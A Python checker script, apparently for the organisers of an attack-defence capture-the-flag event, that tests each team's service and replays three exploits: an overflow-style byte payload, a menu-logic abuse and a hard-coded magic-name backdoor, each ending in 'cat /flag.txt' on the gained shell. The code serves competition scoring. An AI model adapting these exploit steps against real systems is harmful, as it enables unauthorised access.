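#! /usr/bin/env python3
"""Round-based service and exploit checker for the SlashRootCTF challenge.

Every INTERVAL seconds the checker connects to each team's copy of the
service (HOST, port BASE_PORT + team * PORT_STRIDE), verifies that the
service still answers its normal dialogue (`poc`) and replays the three
known exploits (`poc0`, `poc1`, `poc2`).  Each exploit returns the flag it
retrieved, or False.  Per-team lines and a per-round summary go to
checker.log and to the console.

NOTE(security): a successful exploit returns the flag itself, so
checker.log contains every team's flag in plaintext -- keep the file
readable by organisers only.

Changes versus the first version:
  * every connection has a TIMEOUT; a team service that accepts the TCP
    connection and then hangs previously blocked the whole round forever,
  * connection errors (not just EOFError), timeouts and undecodable
    output are reported as False instead of crashing a worker and, with
    it, the Pool.map call and the whole checker loop,
  * results are passed around as a tuple instead of being re-parsed out
    of the formatted log line (a flag containing a space broke that).
"""
from __future__ import annotations

import logging
import os
from multiprocessing import Pool
from time import sleep
from typing import NamedTuple

from pwn import context, remote

# pwntools is chatty by default; only its errors are interesting here.
context.log_level = logging.ERROR

INTERVAL = 60              # seconds between two rounds
HOST = "192.168.2.20"
TOTAL_TEAMS = 10
BASE_PORT = 60004          # team N listens on BASE_PORT + N * PORT_STRIDE
PORT_STRIDE = 100
FORMAT = "SlashRootCTF"    # flag prefix; output without it is not a flag
FLAG_LEN = 46              # the flag is the last FLAG_LEN characters of the output
TIMEOUT = 10               # per-connection timeout in seconds (recv returns b"" on expiry)

PROMPT = b">"              # the service ends every menu/question with this byte

logger = logging.getLogger("checker")


def _connect(host: str, port: int):
    """Open a TCP connection to the service with the checker-wide TIMEOUT.

    Raises whatever pwntools raises on a refused/unreachable connection;
    callers turn that into a False result.
    """
    return remote(host, port, timeout=TIMEOUT)


def _recv_text(p) -> str:
    """Read up to the next PROMPT and return it as text.

    Undecodable bytes are replaced rather than raised: the exploits send
    raw bytes that the service may echo back, and a UnicodeDecodeError
    would otherwise escape the EOFError handling and kill the worker.
    On timeout pwntools returns b"", which decodes to "" and fails every
    substring check below as intended.
    """
    return p.recvuntil(PROMPT).decode("utf-8", errors="replace")


def _read_flag(p) -> str | bool:
    """Shared tail of the three exploits: walk the remaining menus and cat the flag.

    Sends "4", then "y", answers the next ten prompts with "99", runs
    `cat /flag.txt` and reads until the closing brace.  Returns the last
    FLAG_LEN characters when the output carries the FORMAT prefix, else
    False (which also covers a timeout, where the read returns b"").
    """
    p.recvuntil(PROMPT)
    p.sendline(b"4")
    p.recvuntil(PROMPT)
    p.sendline(b"y")
    for _ in range(10):
        p.recvuntil(PROMPT)
        p.sendline(b"99")
    p.sendline(b"cat /flag.txt")
    flag = p.recvuntil(b"}").decode("utf-8", errors="replace")
    return flag[-FLAG_LEN:] if FORMAT in flag else False


def poc0(host: str, port: int) -> str | bool:
    """Exploit 1: 32 bytes of filler plus a short binary payload at the first prompt.

    The service must answer with something containing "young"; then "y"
    and "2" are sent before the shared flag-reading tail.
    Returns the flag string, or False if the service did not react as the
    exploit expects or the connection failed.
    """
    try:
        with _connect(host, port) as p:
            p.recvuntil(PROMPT)
            p.sendline(b"A" * 32 + b"\x11" * 8 + b"\x01")
            if "young" not in _recv_text(p):
                return False
            p.sendline(b"y")
            p.recvuntil(PROMPT)
            p.sendline(b"2")
            return _read_flag(p)
    except Exception as exc:  # boundary: a dead or broken team service must not kill the round
        logger.debug("poc0 against %s:%s failed: %r", host, port, exc)
        return False


def poc1(host: str, port: int) -> str | bool:
    """Exploit 2: log in as "Leo", then twice choose "3"/"0".

    If the service is back at the "Who" question afterwards the exploit
    did not work and False is returned; otherwise "y" and "1" are sent
    before the shared flag-reading tail.
    Returns the flag string or False.
    """
    try:
        with _connect(host, port) as p:
            p.recvuntil(PROMPT)
            p.sendline(b"Leo")
            p.recvuntil(PROMPT)
            p.sendline(b"y")
            for _ in range(2):
                p.recvuntil(PROMPT)
                p.sendline(b"3")
                p.recvuntil(PROMPT)
                p.sendline(b"0")
            if "Who" in _recv_text(p):
                return False
            p.sendline(b"y")
            p.recvuntil(PROMPT)
            p.sendline(b"1")
            return _read_flag(p)
    except Exception as exc:  # boundary: see poc0
        logger.debug("poc1 against %s:%s failed: %r", host, port, exc)
        return False


def poc2(host: str, port: int) -> str | bool:
    """Exploit 3: log in with a fixed magic name and pick menu entry "6".

    The response must show "Lv: 1000000"; then "2" is sent before the
    shared flag-reading tail.  Returns the flag string or False.
    """
    try:
        with _connect(host, port) as p:
            p.recvuntil(PROMPT)
            p.sendline(b"__th3_w0rLd_D3str0Y3r_15_b4ck__")
            p.recvuntil(PROMPT)
            p.sendline(b"y")
            p.recvuntil(PROMPT)
            p.sendline(b"6")
            if "Lv: 1000000" not in _recv_text(p):
                return False
            p.sendline(b"2")
            return _read_flag(p)
    except Exception as exc:  # boundary: see poc0
        logger.debug("poc2 against %s:%s failed: %r", host, port, exc)
        return False


def poc(host: str, port: int) -> bool:
    """Liveness check: does the service still run its normal opening dialogue?

    Expects a "Who" question, answers "Leo", expects "Leo" to be echoed,
    confirms with "Y" and expects a "What" question.  Returns True only
    if all three replies arrived; connection failures count as False
    (the first version let them propagate and abort the round).
    """
    try:
        with _connect(host, port) as p:
            if "Who" not in _recv_text(p):
                return False
            p.sendline(b"Leo")
            if "Leo" not in _recv_text(p):
                return False
            p.sendline(b"Y")
            return "What" in _recv_text(p)
    except Exception as exc:  # boundary: see poc0
        logger.debug("poc against %s:%s failed: %r", host, port, exc)
        return False


class TeamResult(NamedTuple):
    """Outcome of one round against one team.

    `alive` is the liveness result; `vuln1..3` hold the flag returned by
    the corresponding exploit, or False.
    """

    team: int
    alive: bool
    vuln1: str | bool
    vuln2: str | bool
    vuln3: str | bool

    def summary(self) -> str:
        """The per-team log line, in the same layout as before."""
        return "Team [{:02d}] {} {} {} {}".format(
            self.team, self.alive, self.vuln1, self.vuln2, self.vuln3)

    def successes(self) -> tuple[bool, bool, bool, bool]:
        """One boolean per check (alive, vuln1, vuln2, vuln3): anything but False counts."""
        return tuple(value is not False for value in self[1:])


def team_port(team: int) -> int:
    """Port of team `team`'s service instance."""
    return BASE_PORT + team * PORT_STRIDE


def check_team(team: int) -> TeamResult:
    """Run the liveness check and the three exploits against one team."""
    port = team_port(team)
    return TeamResult(team,
                      poc(HOST, port),
                      poc0(HOST, port),
                      poc1(HOST, port),
                      poc2(HOST, port))


def check(team: int) -> str:
    """Compatibility wrapper returning the formatted line (see TeamResult.summary)."""
    return check_team(team).summary()


def init_logging(logFileName: str, debug: bool = False):
    """Configure and return the "checker" logger.

    Attaches a file handler (logFileName) and a console handler with the
    same timestamped format and sets the level to DEBUG when `debug` is
    true, INFO otherwise.  Call once: handlers accumulate on repeat calls.
    """
    formatter = logging.Formatter(
        fmt="[%(asctime)s][%(levelname)s] %(message)s",
        datefmt='%d-%b-%y %H:%M:%S')
    checker_logger = logging.getLogger("checker")

    file_handler = logging.FileHandler(logFileName)
    file_handler.setFormatter(formatter)
    checker_logger.addHandler(file_handler)

    console_handler = logging.StreamHandler()
    console_handler.setFormatter(formatter)
    checker_logger.addHandler(console_handler)

    checker_logger.setLevel(logging.DEBUG if debug else logging.INFO)
    return checker_logger


def main() -> None:
    """Check all teams in parallel every INTERVAL seconds, forever."""
    checker_logger = init_logging("checker.log")
    while True:
        with Pool(TOTAL_TEAMS) as pool:
            results = pool.map(check_team, range(1, TOTAL_TEAMS + 1))
        # counts[0] = services alive, counts[1..3] = exploits that returned a flag
        counts = [0, 0, 0, 0]
        for result in results:
            checker_logger.info(result.summary())
            for index, ok in enumerate(result.successes()):
                counts[index] += ok
        checker_logger.info(
            "Summary: {} working as expected, 1st vuln {}, 2nd vuln {}, 3rd vuln {}".format(*counts))
        sleep(INTERVAL)


if __name__ == "__main__":
    main()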